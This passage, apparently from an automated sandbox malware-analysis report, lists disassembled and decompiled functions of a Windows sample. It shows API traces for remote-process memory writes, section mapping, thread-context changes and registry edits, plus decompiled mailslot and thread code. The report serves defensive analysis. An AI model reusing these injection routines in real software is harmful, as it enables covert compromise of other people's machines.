    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
